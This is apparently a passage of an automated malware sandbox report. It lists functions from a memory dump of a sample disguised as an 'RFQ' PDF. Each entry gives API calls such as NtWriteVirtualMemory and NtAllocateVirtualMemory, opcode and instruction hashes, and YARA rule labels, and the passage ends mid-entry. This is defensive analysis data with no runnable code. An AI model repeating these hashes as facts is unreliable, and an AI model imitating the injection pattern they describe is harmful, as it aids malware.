                              • Instruction ID: 36c971dfb485837bba428652a5867b00eb708c1c810ad0fd3ae3326d0cae8aec
                              • Opcode Fuzzy Hash: 6182174ddf156b8bb8f67336e987dcb0ef3b8a89da37d295db65e9adfd99ba94
                              • Instruction Fuzzy Hash: EDD1DD72544388DFDB769E28CD887EE7BB6FF55340F59802ADC899B220C3709A45DB42
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B8111, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 298COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: k,I5
                              • API String ID: 0-2335973621
                              • Opcode ID: 9810e48ee57c2968b4b8f65fb6f0520ec7808616c6a7de347e588f4a5623d80e
                              • Instruction ID: f1d0d8189e8c1b03790851cc82d9541adccedf084b1acbb697c8eb9237f6559e
                              • Opcode Fuzzy Hash: 9810e48ee57c2968b4b8f65fb6f0520ec7808616c6a7de347e588f4a5623d80e
                              • Instruction Fuzzy Hash: 8CD1CC72544388DFDB769E28CD887EE7BB6FF55300F19842ADC899B220C3709A45DB42
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B8086, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 296nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtWriteVirtualMemory.NTDLL(?,7246379C,?,00000000,?), ref: 020B889B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: MemoryVirtualWrite
                              • String ID: k,I5
                              • API String ID: 3527976591-2335973621
                              • Opcode ID: 43a2b3c6200a02a2c5f757d1f0d1f0519c0502e189a1cd7ec6f86c2b509f08a4
                              • Instruction ID: 839cff781621c23175947dfd6a47358d84ca59dfc678104d36867c0a57fd6291
                              • Opcode Fuzzy Hash: 43a2b3c6200a02a2c5f757d1f0d1f0519c0502e189a1cd7ec6f86c2b509f08a4
                              • Instruction Fuzzy Hash: 2BD1BB72544388DFDB769E28CD887EE7BB6FF55350F59802ADC899B220C3708A45DB42
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B80A9, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 296COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: k,I5
                              • API String ID: 0-2335973621
                              • Opcode ID: 4b822512a7a6870a6aaada908afc375f0cc817f42a979a0cfc7bbfdbfe4a93a0
                              • Instruction ID: 13401df0e8a659f7061ccfc5f798512fe535b6cea5d4aefa1ba078db9bf2f662
                              • Opcode Fuzzy Hash: 4b822512a7a6870a6aaada908afc375f0cc817f42a979a0cfc7bbfdbfe4a93a0
                              • Instruction Fuzzy Hash: 2CD1CE72544388DFDB769E28CD887DE7BB6FF55340F59801ADC899B220C3709A45DB42
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B811D, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 296COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: k,I5
                              • API String ID: 0-2335973621
                              • Opcode ID: f57c5c222db43dd9cbdfe2fc1a7550f5792d4ae011fc1232dc08fb599be6f413
                              • Instruction ID: 4c7ab8546ee61fdb8ddd0d0b0e64f841778b42e9104461f67a37d6e8cb2f1c56
                              • Opcode Fuzzy Hash: f57c5c222db43dd9cbdfe2fc1a7550f5792d4ae011fc1232dc08fb599be6f413
                              • Instruction Fuzzy Hash: 12D1DD72544388DFDB769E28CD887EE7BB6FF55300F19802ADC899B220C3709A45DB42
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B81C5, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 287COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: k,I5
                              • API String ID: 0-2335973621
                              • Opcode ID: 0c18da9687c8f07d673e607470101126d1185dc5e8444f29bfa918647e87288e
                              • Instruction ID: 72e33b81f4caf38d8f25a22652bbfa267e5a43280d1ebff2c83218fec35eeca6
                              • Opcode Fuzzy Hash: 0c18da9687c8f07d673e607470101126d1185dc5e8444f29bfa918647e87288e
                              • Instruction Fuzzy Hash: 51C1CE72544388DFDB769E28CD887DE7BB6FF95310F59802ADC899B220C3709A45DB41
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B81DD, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 286nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtWriteVirtualMemory.NTDLL(?,7246379C,?,00000000,?), ref: 020B889B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: MemoryVirtualWrite
                              • String ID: k,I5
                              • API String ID: 3527976591-2335973621
                              • Opcode ID: 6e8b0a0f93697a9d6d5105c48d8c055ad497bda09a7b033b4c3005ee2579c619
                              • Instruction ID: de20f80b94afc8320fa47f38685c64df6212c92d781b820acbda5ef0332b4e75
                              • Opcode Fuzzy Hash: 6e8b0a0f93697a9d6d5105c48d8c055ad497bda09a7b033b4c3005ee2579c619
                              • Instruction Fuzzy Hash: 83C1CD72544388DFDB769E28CD847DE7BB6FF95310F59802ADC899B220C3708A45DB42
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B81D1, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 281COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: k,I5
                              • API String ID: 0-2335973621
                              • Opcode ID: 1a2c0d0cdcce013696ad3c828c402458e1760c7498fab1a03b08a6ea8abf68ff
                              • Instruction ID: 0d4d8d4463e547a129e579774a44fc9e35854d056786e55c83802f850c90d9a2
                              • Opcode Fuzzy Hash: 1a2c0d0cdcce013696ad3c828c402458e1760c7498fab1a03b08a6ea8abf68ff
                              • Instruction Fuzzy Hash: 5BC1CD72544388DFDB769E28CD887DE7BB6FFA5310F598029DC899B220C3709A45DB42
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B8209, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 277COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: k,I5
                              • API String ID: 0-2335973621
                              • Opcode ID: 418682a8552a92b905e8068ff4015fc2e4f51fae50e2a1bf5c8540f3557403f2
                              • Instruction ID: 414746b074115abbe127ea598b9cee980fd7b6530bab3d176b78c4a4abfc9507
                              • Opcode Fuzzy Hash: 418682a8552a92b905e8068ff4015fc2e4f51fae50e2a1bf5c8540f3557403f2
                              • Instruction Fuzzy Hash: 14C1BD72544388DFDB769E28CD887DE7BB6FF95310F59801ADC899B220C3709A45DB42
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B8215, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 273COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: k,I5
                              • API String ID: 0-2335973621
                              • Opcode ID: 88b93e665ec1b27458e5315d29fa4cabf519c44aa085f1481c1423cfd8da5b7b
                              • Instruction ID: 18197324eadcd83c11b8e7e14fcebdcc759baee6964fe6c5af4074b88bea69a3
                              • Opcode Fuzzy Hash: 88b93e665ec1b27458e5315d29fa4cabf519c44aa085f1481c1423cfd8da5b7b
                              • Instruction Fuzzy Hash: B3C1DD72544388DFDB769E28CD887DE7BB6FF95300F59802ADC899B220C3709A45DB42
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B8221, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 271COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: k,I5
                              • API String ID: 0-2335973621
                              • Opcode ID: f3de8bf512309f7be3d3988edcb0e96cc9254d2ec64a865159219b793a632fea
                              • Instruction ID: 6a9a976a1f4f9561016727a1d8b12e93dc23abc21dbcb874b1a8e1928898e391
                              • Opcode Fuzzy Hash: f3de8bf512309f7be3d3988edcb0e96cc9254d2ec64a865159219b793a632fea
                              • Instruction Fuzzy Hash: D4C1CD72544388DFDB769E28CD887DE7BB6FF95310F598029DC899B220C3708A45DB42
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B8285, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 269nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtWriteVirtualMemory.NTDLL(?,7246379C,?,00000000,?), ref: 020B889B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: MemoryVirtualWrite
                              • String ID: k,I5
                              • API String ID: 3527976591-2335973621
                              • Opcode ID: 722e58813a62c9433a619f2f13dd573e7678502821e0e2085c28dac143fe186f
                              • Instruction ID: 949f5672cf2bd01a0a4377ad3cf605c91c81976b737bf3af7180098f4f47b281
                              • Opcode Fuzzy Hash: 722e58813a62c9433a619f2f13dd573e7678502821e0e2085c28dac143fe186f
                              • Instruction Fuzzy Hash: D1C1BD72544388DFDB769E28CD847DA7BB6FF95310F598029DC899B220C3709A45EB42
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B8308, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 252nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtWriteVirtualMemory.NTDLL(?,7246379C,?,00000000,?), ref: 020B889B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: MemoryVirtualWrite
                              • String ID: k,I5
                              • API String ID: 3527976591-2335973621
                              • Opcode ID: a7f58c73ec9f4f84efd859d4141dc16d5b2fe0616801b5f526bc5d27b7ba77dc
                              • Instruction ID: 57a4d034b94ff7731077705a267d515b105034f8db8593f375bc526aecef7585
                              • Opcode Fuzzy Hash: a7f58c73ec9f4f84efd859d4141dc16d5b2fe0616801b5f526bc5d27b7ba77dc
                              • Instruction Fuzzy Hash: F5B1CD72544388DFDB769E28CD887DE7BB6FF95310F59802ADC898B220C3708A45DB41
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B8279, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 248COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: k,I5
                              • API String ID: 0-2335973621
                              • Opcode ID: 78e2b4d2c512d40363006af76755a563b91c77118006cf09e4fce92549ad67c9
                              • Instruction ID: b9d41e01faab0a83e6e641a39a28a33014efb9f159e4cfeb352a35e5ea4a25d1
                              • Opcode Fuzzy Hash: 78e2b4d2c512d40363006af76755a563b91c77118006cf09e4fce92549ad67c9
                              • Instruction Fuzzy Hash: 0CB1CE71544388DFDB769E28CD887DE7BB6FFA5300F59802ADD888B220C3709A45EB41
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B82F9, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 245COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: k,I5
                              • API String ID: 0-2335973621
                              • Opcode ID: c399844d9c640a569649123b33025d50f0fa4ff6c8a146936c66b37b2d02622e
                              • Instruction ID: a59f80a625846c4dc0677cfeef4ba3780fcead8de98ec617e7809586f63b6058
                              • Opcode Fuzzy Hash: c399844d9c640a569649123b33025d50f0fa4ff6c8a146936c66b37b2d02622e
                              • Instruction Fuzzy Hash: F7B1CE71544388DFDB769E28CD887DE7BB6FFA5300F59802ADD888B220C3749A45EB41
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B8369, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 245COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: k,I5
                              • API String ID: 0-2335973621
                              • Opcode ID: 08c37019b1cd19ac3e39ed5efe6e43120f5777d5cfb281f3616bc1eca80ef420
                              • Instruction ID: c6ab78e88c6094e4bf6cc3995d8c055a5aab8c9e5c2f635c32575ea871b002f3
                              • Opcode Fuzzy Hash: 08c37019b1cd19ac3e39ed5efe6e43120f5777d5cfb281f3616bc1eca80ef420
                              • Instruction Fuzzy Hash: 89B1CE71544388DFDB769E28CD887DE7BB6FFA5340F59802ADD898B220C3705A45EB41
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B81F8, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 245nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtWriteVirtualMemory.NTDLL(?,7246379C,?,00000000,?), ref: 020B889B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: MemoryVirtualWrite
                              • String ID: k,I5
                              • API String ID: 3527976591-2335973621
                              • Opcode ID: a345fe60a60d74f73f1f8a002f502a2203b4b04b869063e8d7c477711e1a814b
                              • Instruction ID: 15e192656656b24f5a46378458a7310204c35d5b4f1655105545fa63c19e1f5a
                              • Opcode Fuzzy Hash: a345fe60a60d74f73f1f8a002f502a2203b4b04b869063e8d7c477711e1a814b
                              • Instruction Fuzzy Hash: C7B1BD71544388DFDB769E28CD887DE7BB6FFA5300F59802ADD898B220C3709A45EB41
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B826D, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 237COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: k,I5
                              • API String ID: 0-2335973621
                              • Opcode ID: 34f944ccb600db8eacb1ba8ed5e05d4c604126a7cdc193c2659d297977b9f78a
                              • Instruction ID: daf818be324d5a9d2f9c29e7707fab39bf11774421ff0e34bd460db4f79ca876
                              • Opcode Fuzzy Hash: 34f944ccb600db8eacb1ba8ed5e05d4c604126a7cdc193c2659d297977b9f78a
                              • Instruction Fuzzy Hash: 67A1AE71544388DFDB769E28CD887DE7BB6FFA5300F59802ADD898B220C3705A45EB41
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B82ED, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 234COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: k,I5
                              • API String ID: 0-2335973621
                              • Opcode ID: 5042a8d72af467cd02677fecd48c40443fc6fac8ce548fcd46f4c4a966ffde0c
                              • Instruction ID: 52c8c304976fe7af220d39199bf7ed35d8f17341f1d98df24c3e9ab6fc04ddb3
                              • Opcode Fuzzy Hash: 5042a8d72af467cd02677fecd48c40443fc6fac8ce548fcd46f4c4a966ffde0c
                              • Instruction Fuzzy Hash: 30A1AC72544388DFDB769E28CD887DE7BB6FFA5300F59802ADD498B220C3709A45EB41
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B83E1, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 226nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtWriteVirtualMemory.NTDLL(?,7246379C,?,00000000,?), ref: 020B889B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: MemoryVirtualWrite
                              • String ID: k,I5
                              • API String ID: 3527976591-2335973621
                              • Opcode ID: 3990a55e479d88386cb94d70896ee1fcf0b254d4f6f1003bda54bdcb05bbd393
                              • Instruction ID: 9ea9942409b0f8bf91f37d6f27ee762664cabb4309c13eb7fb48d8e227ce705b
                              • Opcode Fuzzy Hash: 3990a55e479d88386cb94d70896ee1fcf0b254d4f6f1003bda54bdcb05bbd393
                              • Instruction Fuzzy Hash: C9A19A72544388DFDB769E28CD887DE7BB6FFA5300F59802ADD499B220C3709A45EB41
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B84C5, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 187COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: k,I5
                              • API String ID: 0-2335973621
                              • Opcode ID: 33c6b232abf2a8a03e4719fa50727e901301cb116b641ac9a40c177cc02157c2
                              • Instruction ID: a81b4342b743d36909f84eb8c82e7f5f19f7b1d3991616efc587d5204ebd0961
                              • Opcode Fuzzy Hash: 33c6b232abf2a8a03e4719fa50727e901301cb116b641ac9a40c177cc02157c2
                              • Instruction Fuzzy Hash: 9C81AC71544388DFDB769E29CC887DE7BB6BFA9300F59802ADD488B220C3749A45DB41
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B850C, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 172nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtWriteVirtualMemory.NTDLL(?,7246379C,?,00000000,?), ref: 020B889B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: MemoryVirtualWrite
                              • String ID: k,I5
                              • API String ID: 3527976591-2335973621
                              • Opcode ID: 1f868b7d753e95280e7afd96cb8aba025e9c9a43d12adbbd69f5409cbe4edeb2
                              • Instruction ID: 2c410f7522ab5df7a0ef13810c76e913bb6bcd9e335300c3ad635715722ffc56
                              • Opcode Fuzzy Hash: 1f868b7d753e95280e7afd96cb8aba025e9c9a43d12adbbd69f5409cbe4edeb2
                              • Instruction Fuzzy Hash: 68819A71544388DFDB769F28CC887DE7BB6BFA9310F59802ADD898B220C3745A45DB42
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B862D, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 155nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtWriteVirtualMemory.NTDLL(?,7246379C,?,00000000,?), ref: 020B889B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: MemoryVirtualWrite
                              • String ID: k,I5
                              • API String ID: 3527976591-2335973621
                              • Opcode ID: cfda0af7fa0a519d47bf6c7a81d64b1489b87db33b5219124f9178759c1a42c9
                              • Instruction ID: 8318d30e97a0ac47546fdc117ba8ac59c810ba88f4f8d35bd8565a073497b116
                              • Opcode Fuzzy Hash: cfda0af7fa0a519d47bf6c7a81d64b1489b87db33b5219124f9178759c1a42c9
                              • Instruction Fuzzy Hash: CB61AB71504389DFDF769E24CD887DE7BB6BFA5300F59802ADD884B220C3745A45DB41
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B85B9, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 155nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtWriteVirtualMemory.NTDLL(?,7246379C,?,00000000,?), ref: 020B889B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: MemoryVirtualWrite
                              • String ID: k,I5
                              • API String ID: 3527976591-2335973621
                              • Opcode ID: 55500197ad8942d3f1afc972369b28fffb041770bb327a0179e2f08038bf1f27
                              • Instruction ID: 9cca93e134740cdff25363a2a3690adc695271f44a9274c2aa6a28eb20b0a294
                              • Opcode Fuzzy Hash: 55500197ad8942d3f1afc972369b28fffb041770bb327a0179e2f08038bf1f27
                              • Instruction Fuzzy Hash: 2961BAB1544388DFDF769E28CD887DE7BB6BFA9300F59802ADD894B220C3745A45DB42
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B9405, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 128memorynativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtAllocateVirtualMemory.NTDLL(-000000015FA4E159,?,A3C14262), ref: 020B9750
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateMemoryVirtual
                              • String ID: Z
                              • API String ID: 2167126740-1505515367
                              • Opcode ID: 49aeaded7ca42f476da67375e1b8d3fa8ebbd644d2ca7c2e7e52cdb87d19cea9
                              • Instruction ID: dd6063cac64b9864b4154e0fced6baf80a3a272c0a1a7686dc6432a109b382d5
                              • Opcode Fuzzy Hash: 49aeaded7ca42f476da67375e1b8d3fa8ebbd644d2ca7c2e7e52cdb87d19cea9
                              • Instruction Fuzzy Hash: 1A41BBB1618388CFDB769E28DC907EE37A6EF49314F11412EAD4A9A750D2308A41DF16
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B9481, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 126memorynativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtAllocateVirtualMemory.NTDLL(-000000015FA4E159,?,A3C14262), ref: 020B9750
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateMemoryVirtual
                              • String ID: Z
                              • API String ID: 2167126740-1505515367
                              • Opcode ID: 87ae71c83793b0828072b39f1ce52332dfabb7cacbfddaf9a42641ec204c2f64
                              • Instruction ID: f86d12381891c0a16820bbda5f2df6ad57039e7583ee7f13ac1200bb02e81945
                              • Opcode Fuzzy Hash: 87ae71c83793b0828072b39f1ce52332dfabb7cacbfddaf9a42641ec204c2f64
                              • Instruction Fuzzy Hash: 2241FDB1618388CFEB769E24DC907EE36A6EF49314F11412EED4A8B750D3308A40DF12
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B94C8, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 119memorynativeCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 020BBAE2: LoadLibraryA.KERNELBASE(?), ref: 020BBCE5
                              • NtAllocateVirtualMemory.NTDLL(-000000015FA4E159,?,A3C14262), ref: 020B9750
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateLibraryLoadMemoryVirtual
                              • String ID: Z
                              • API String ID: 2616484454-1505515367
                              • Opcode ID: b6d432c390b13adac176f9a8b6a4deea9c125d952fe7ba966d548a46a811f3e3
                              • Instruction ID: d5379e82556c2aa3eb492e3e4bc7e5e4a0aabc6f02bf3393890af25b7b6af7ae
                              • Opcode Fuzzy Hash: b6d432c390b13adac176f9a8b6a4deea9c125d952fe7ba966d548a46a811f3e3
                              • Instruction Fuzzy Hash: CD41BEB1614388CFDB769E28DD907EE36A6EF59314F11412DAD4A9B750E3348A40DF12
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B8609, Relevance: 1.6, APIs: 1, Instructions: 143nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtWriteVirtualMemory.NTDLL(?,7246379C,?,00000000,?), ref: 020B889B
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: MemoryVirtualWrite
                              • String ID:
                              • API String ID: 3527976591-0
                              • Opcode ID: 346eb58b31adfe81eeba7ebad0b14a0a4a65cfe11463d76c81d99b348ccc4db9
                              • Instruction ID: 01654f40da0ce2adec7fda2bb2652d6b95957200f461cd0c158ef7b55f196ace
                              • Opcode Fuzzy Hash: 346eb58b31adfe81eeba7ebad0b14a0a4a65cfe11463d76c81d99b348ccc4db9
                              • Instruction Fuzzy Hash: FB51CC71505388DFDF769E24CD887DE7BB6BFA5300F68802ADD484B220C7755A05DB41
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B85A1, Relevance: 1.6, APIs: 1, Instructions: 143nativeCOMMON
                              Download Yara Rule
                              APIs
